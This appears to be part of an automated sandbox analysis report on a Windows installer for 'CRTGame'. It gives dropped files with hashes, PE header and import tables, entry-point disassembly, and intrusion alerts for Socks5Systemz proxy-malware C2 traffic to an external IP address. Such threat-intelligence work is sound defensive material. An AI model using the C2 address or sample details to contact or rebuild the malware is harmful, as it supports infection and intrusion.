                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:modified
                                                                        Size (bytes):2199540
                                                                        Entropy (8bit):6.34382356471681
                                                                        Encrypted:false
                                                                        SSDEEP:24576:vWtUNVKKo/Ji9iOu/6fVTC75GvMQ5HwTQKmMEV7anImzSVG61jZJ+WFchgsvKIgX:+t0Z590/6o75QHW7mMwmzialW7R5Z/h
                                                                        MD5:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                        SHA1:5017DC7277DBC5BB0B6F8428E4FF72603E3A370B
                                                                        SHA-256:59495C6E79C301F767F3D336050FB9927826F0AE972D634D395F5B44D7280A09
                                                                        SHA-512:4BE3E838FB41CD4D01A12B639CDCB93DF94DEEC0DEBD2593C53BBFE977DAF5BCB9E3F97F6C47D33E76AEA12AE2F9224F27652DFB5B5A69F53D201184766FFF91
                                                                        Malicious:true
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L.....ue.................@...................P....@...........................!......."......................................Y..P........G...........................................................................P...............................text....;.......@.................. ..`.rdata.......P... ...P..............@..@.data....P...p...0...p..............@....rsrc....G.......P..................@..@.hsave....... ......................`...................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):2199540
                                                                        Entropy (8bit):6.343823195460407
                                                                        Encrypted:false
                                                                        SSDEEP:24576:EWtUNVKKo/Ji9iOu/6fVTC75GvMQ5HwTQKmMEV7anImzSVG61jZJ+WFchgsvKIgX:zt0Z590/6o75QHW7mMwmzialW7R5Z/h
                                                                        MD5:EB732B105CEAE8D6D08B309621C239F5
                                                                        SHA1:B673ABD9B9A11193DE071C3C98B372A0EEFD2C50
                                                                        SHA-256:839DC7452F0E0FD9328B4A19800F630B29AFFDF7D7F30A93E3F19364CB30A1ED
                                                                        SHA-512:F8BC354CA40CC6F47535E60D66B1907A711D28DC3C5822CFD1F461C6173D171358B8BD0FCC912A0AB74CA4046313703D451167544F79A7C182221CF5FEFD4691
                                                                        Malicious:false
                                                                        Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L.....ue.................@...................P....@...........................!......."......................................Y..P........G...........................................................................P...............................text....;.......@.................. ..`.rdata.......P... ...P..............@..@.data....P...p...0...p..............@....rsrc....G.......P..................@..@.hsave....... ......................`...................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:IFF data
                                                                        Category:dropped
                                                                        Size (bytes):1716
                                                                        Entropy (8bit):4.781797138644031
                                                                        Encrypted:false
                                                                        SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                        MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                        SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                        SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                        SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                        Malicious:false
                                                                        Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1825
                                                                        Entropy (8bit):5.088030483893024
                                                                        Encrypted:false
                                                                        SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                        MD5:992C00BEAB194CE392117BB419F53051
                                                                        SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                        SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                        SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                        Malicious:false
                                                                        Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):714526
                                                                        Entropy (8bit):6.5053900039496435
                                                                        Encrypted:false
                                                                        SSDEEP:12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
                                                                        MD5:3910EA485B6F67ECAF6B34DDB4BE5980
                                                                        SHA1:85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
                                                                        SHA-256:FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
                                                                        SHA-512:65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:InnoSetup Log CRTGame, version 0x30, 8021 bytes, 445817\user, "C:\Program Files (x86)\CRTGame"
                                                                        Category:dropped
                                                                        Size (bytes):8021
                                                                        Entropy (8bit):5.052811074826732
                                                                        Encrypted:false
                                                                        SSDEEP:96:G3N8WVPpbbK+T4hlOIhlXWx4cVSQs0Ln9DE2VYW4G:G98WVPp1+QIhs+cVSQ1n/m4
                                                                        MD5:3BF5D8BA467366603216E50DBBA55412
                                                                        SHA1:F525EB1F0F9B3645F27ABF2EC1615C882BBE0F4E
                                                                        SHA-256:9BA02EAC39943E350D0C4D23B0DBB45D2B6CE215F40AE6AFD6C8BE40E6C299DD
                                                                        SHA-512:5548C98EF6B80BA6E31A1098B7F6178C77268A35D857985A97274D0AFC8EAE972D130046B8E2727BEC49198F58CAF30938D1A3AC0EAA77544E2B40664B8814E7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2199540
                                                                        Entropy (8bit):6.34382356471681
                                                                        Encrypted:false
                                                                        SSDEEP:24576:vWtUNVKKo/Ji9iOu/6fVTC75GvMQ5HwTQKmMEV7anImzSVG61jZJ+WFchgsvKIgX:+t0Z590/6o75QHW7mMwmzialW7R5Z/h
                                                                        MD5:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                        SHA1:5017DC7277DBC5BB0B6F8428E4FF72603E3A370B
                                                                        SHA-256:59495C6E79C301F767F3D336050FB9927826F0AE972D634D395F5B44D7280A09
                                                                        SHA-512:4BE3E838FB41CD4D01A12B639CDCB93DF94DEEC0DEBD2593C53BBFE977DAF5BCB9E3F97F6C47D33E76AEA12AE2F9224F27652DFB5B5A69F53D201184766FFF91
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):4
                                                                        Entropy (8bit):0.8112781244591328
                                                                        Encrypted:false
                                                                        SSDEEP:3:y:y
                                                                        MD5:D83A262FC46BD9C9D48FF14208EF17BC
                                                                        SHA1:D742C6B01FE4B5D54EE43A031637753232284E8B
                                                                        SHA-256:40D95A7C7F1655A0070DDF3CE81EB83C0E88AB92766B85E6A0BB98503896E036
                                                                        SHA-512:21C38C9D3047923AAF00A89E5824D8B3FD8C378710856293FC3C26B88D4B73F00D9EB4C857F66B12A5943CAE59EC7644DCD6B42D0FD4A240EC20425002EADF6C
                                                                        Malicious:false
                                                                        Preview:3...
                                                                        Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):128
                                                                        Entropy (8bit):2.862976125752538
                                                                        Encrypted:false
                                                                        SSDEEP:3:1k/QnTzXD9iIgAnDTa3pkHil/:11TzXD9iIxPa3pkHit
                                                                        MD5:785BB7F0B0CEF59C39B9F5E21CD2FD04
                                                                        SHA1:1E1FFDEE1584A00BDE18BD7BD19C02988301C250
                                                                        SHA-256:90B35EC0C6B41ACEC2C9BB51CDDCB6339FB035C222766A4CA4CBB15B7A7D8853
                                                                        SHA-512:6D2449E111F7F059734960B83B0B090A7239EE2D93EB70F839ECDDAA640658B90667F123CFB4FE8E0F5DC0A854A47B62AA2FCAF971D08B9118CAC840DBF999EB
                                                                        Malicious:false
                                                                        Preview:3e0f25005939fee32fa196d33e7a2b8f6ce30e1128f6a30e537a9ba072d59a73................................................................
                                                                        Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        File Type:MPEG-4 LOAS
                                                                        Category:dropped
                                                                        Size (bytes):8
                                                                        Entropy (8bit):2.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:1n:1
                                                                        MD5:B03076BE8631D2A185D48B557B040715
                                                                        SHA1:C91360E2020DBF96257AD1E43FED9CBF91AF0C53
                                                                        SHA-256:34D23B5A6F324555AFECC48DD34AC3BD1D3B43A43DE40AF0C9F7DE1B28473201
                                                                        SHA-512:05B848BC891BBE4D63958CC0EC9999979E37E17B7B38B0045496272AFF57DA88C6E28355933E1C1A8C025DC7B73532FFE2E3484FD7A77A706517F81CB9DE304F
                                                                        Malicious:false
                                                                        Preview:V.\g....
                                                                        Process:C:\Users\user\Desktop\j9htknb7BQ.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):704000
                                                                        Entropy (8bit):6.4972640482038075
                                                                        Encrypted:false
                                                                        SSDEEP:12288:XRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExyc:BObekrkfohrP337uzHnA6cHiiHEVVg6X
                                                                        MD5:F448D7F4B76E5C9C3A4EAFF16A8B9B73
                                                                        SHA1:31808F1FFA84C954376975B7CDB0007E6B762488
                                                                        SHA-256:7233B85EB0F8B3AA5CAE3811D727AA8742FEC4D1091C120A0FE15006F424CC49
                                                                        SHA-512:F8197458CD2764C0B852DAC34F9BF361110A7DC86903024A97C7BCD3F77B148342BF45E3C2B60F6AF8198AE3B83938DBAAD5E007D71A0F88006F3A0618CF36F4
                                                                        Malicious:true
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):4096
                                                                        Entropy (8bit):4.026670007889822
                                                                        Encrypted:false
                                                                        SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                        MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                        SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                        SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                        SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2560
                                                                        Entropy (8bit):2.8818118453929262
                                                                        Encrypted:false
                                                                        SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                        MD5:A69559718AB506675E907FE49DEB71E9
                                                                        SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                        SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                        SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):19456
                                                                        Entropy (8bit):5.8975201046735535
                                                                        Encrypted:false
                                                                        SSDEEP:384:ED4NeA1PrXPBdHCNPJEQkWybd0oBSRnAZ806OSDrgtOFXqYUPYNQLJ/k+9tPEBer:64NHPfHCs6GNOpiM+RFjFyzcN23A
                                                                        MD5:3ADAA386B671C2DF3BAE5B39DC093008
                                                                        SHA1:067CF95FBDB922D81DB58432C46930F86D23DDED
                                                                        SHA-256:71CD2F5BC6E13B8349A7C98697C6D2E3FCDEEA92699CEDD591875BEA869FAE38
                                                                        SHA-512:BBE4187758D1A69F75A8CCA6B3184E0C20CF8701B16531B55ED4987497934B3C9EF66ECD5E6B83C7357F69734F1C8301B9F82F0A024BB693B732A2D5760FD303
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):6144
                                                                        Entropy (8bit):4.215994423157539
                                                                        Encrypted:false
                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                        MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                        SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                        SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                        SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):23312
                                                                        Entropy (8bit):4.596242908851566
                                                                        Encrypted:false
                                                                        SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                        MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                        SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                        SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                        SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                        Malicious:false
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.999404760619669
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                        • Inno Setup installer (109748/4) 1.08%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        File name:j9htknb7BQ.exe
                                                                        File size:7'246'011 bytes
                                                                        MD5:168a4450eaf205fa20bcc2d0881c830f
                                                                        SHA1:32e77548315c9d48409057ea43e59ec4be060587
                                                                        SHA256:77b07095ae775cc151b3c35088384ba9dcc722b2b5fcee7fa5a933141db67b26
                                                                        SHA512:9c634f7e858ab4b2edb0544222e3bc1524f7fee29bb368876ade3849b33747939f183e905988d40422b5178c40eb7caa6d58f4c27f455dca89f58b61c12fbaad
                                                                        SSDEEP:196608:9K2+nNevvWstwr2m5BmycyEbSfasepd5e4x6+AjZ6mjxzj:9DY6tiP3myRfzepXe4ny8gxzj
                                                                        TLSH:6E763373295C173AE240CA3166AFE1A9E16A3F3DD53B0690E2C4B1BD1BDF8E1581C725
                                                                        Icon Hash:2d2e3797b32b2b99
                                                                        Entrypoint:0x409c40
                                                                        Entrypoint Section:CODE
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x65765E5E [Mon Dec 11 00:57:02 2023 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:1
                                                                        OS Version Minor:0
                                                                        File Version Major:1
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:1
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                        Instruction
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        add esp, FFFFFFC4h
                                                                        push ebx
                                                                        push esi
                                                                        push edi
                                                                        xor eax, eax
                                                                        mov dword ptr [ebp-10h], eax
                                                                        mov dword ptr [ebp-24h], eax
                                                                        call 00007FADC08139DBh
                                                                        call 00007FADC0814BE2h
                                                                        call 00007FADC0814E71h
                                                                        call 00007FADC0816EA8h
                                                                        call 00007FADC0816EEFh
                                                                        call 00007FADC081981Eh
                                                                        call 00007FADC0819985h
                                                                        xor eax, eax
                                                                        push ebp
                                                                        push 0040A2FCh
                                                                        push dword ptr fs:[eax]
                                                                        mov dword ptr fs:[eax], esp
                                                                        xor edx, edx
                                                                        push ebp
                                                                        push 0040A2C5h
                                                                        push dword ptr fs:[edx]
                                                                        mov dword ptr fs:[edx], esp
                                                                        mov eax, dword ptr [0040C014h]
                                                                        call 00007FADC081A3EBh
                                                                        call 00007FADC081A01Eh
                                                                        lea edx, dword ptr [ebp-10h]
                                                                        xor eax, eax
                                                                        call 00007FADC08174D8h
                                                                        mov edx, dword ptr [ebp-10h]
                                                                        mov eax, 0040CDE8h
                                                                        call 00007FADC0813A87h
                                                                        push 00000002h
                                                                        push 00000000h
                                                                        push 00000001h
                                                                        mov ecx, dword ptr [0040CDE8h]
                                                                        mov dl, 01h
                                                                        mov eax, 0040738Ch
                                                                        call 00007FADC0817D67h
                                                                        mov dword ptr [0040CDECh], eax
                                                                        xor edx, edx
                                                                        push ebp
                                                                        push 0040A27Dh
                                                                        push dword ptr fs:[edx]
                                                                        mov dword ptr fs:[edx], esp
                                                                        call 00007FADC081A45Bh
                                                                        mov dword ptr [0040CDF4h], eax
                                                                        mov eax, dword ptr [0040CDF4h]
                                                                        cmp dword ptr [eax+0Ch], 01h
                                                                        jne 00007FADC081A59Ah
                                                                        mov eax, dword ptr [0040CDF4h]
                                                                        mov edx, 00000028h
                                                                        call 00007FADC0818168h
                                                                        mov edx, dword ptr [000000F4h]
                                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd000 | 0x950 | .idata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x2c00 | .rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0xf000 | 0x18 | .rdata
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                        CODE | 0x1000 | 0x9364 | 0x9400 | 0d7ac17dafcd52a9b3ea353c32256c1d | False | 0.6148648648648649 | data | 6.56223225792919 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        DATA | 0xb000 | 0x24c | 0x400 | 45829356498700390b8c7afa10ea05a4 | False | 0.31640625 | data | 2.7585022150416294 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        BSS | 0xc000 | 0xe4c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .idata | 0xd000 | 0x950 | 0xa00 | bb5485bf968b970e5ea81292af2acdba | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .tls | 0xe000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rdata | 0xf000 | 0x18 | 0x200 | 9ba824905bf9c7922b6fc87a38b74366 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .reloc | 0x10000 | 0x8b4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .rsrc | 0x11000 | 0x2c00 | 0x2c00 | 12ab88ff2529942b16e663a514fbedee | False | 0.32262073863636365 | data | 4.461731535554609 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                        RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
                                                                        RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
                                                                        RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
                                                                        RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
                                                                        RT_STRING | 0x12574 | 0x2f2 | data | | | 0.35543766578249336
                                                                        RT_STRING | 0x12868 | 0x30c | data | | | 0.3871794871794872
                                                                        RT_STRING | 0x12b74 | 0x2ce | data | | | 0.42618384401114207
                                                                        RT_STRING | 0x12e44 | 0x68 | data | | | 0.75
                                                                        RT_STRING | 0x12eac | 0xb4 | data | | | 0.6277777777777778
                                                                        RT_STRING | 0x12f60 | 0xae | data | | | 0.5344827586206896
                                                                        RT_RCDATA | 0x13010 | 0x2c | data | | | 1.1818181818181819
                                                                        RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
                                                                        RT_VERSION | 0x1307c | 0x4b8 | COM executable for DOS | English | United States | 0.27483443708609273
                                                                        RT_MANIFEST | 0x13534 | 0x560 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4251453488372093
                                                                        DLL | Import
                                                                        kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                        user32.dll | MessageBoxA
                                                                        oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                        advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                        kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                        user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                        comctl32.dll | InitCommonControls
                                                                        advapi32.dll | AdjustTokenPrivileges
                                                                        Language of compilation system | Country where language is spoken | Map
                                                                        Dutch | Netherlands |
                                                                        English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-14T03:02:55.599843+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49788 | 94.232.249.187 | 80 | TCP
2024-12-14T03:02:55.599843+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49788 | 94.232.249.187 | 80 | TCP
2024-12-14T03:02:56.223519+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49788 | 94.232.249.187 | 80 | TCP
2024-12-14T03:02:56.223519+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49788 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:00.188392+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49788 | 94.232.249.187 | 80 | TCP
2024-12-14T03:03:00.188392+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49788 | 94.232.249.187 | 80 | TCP
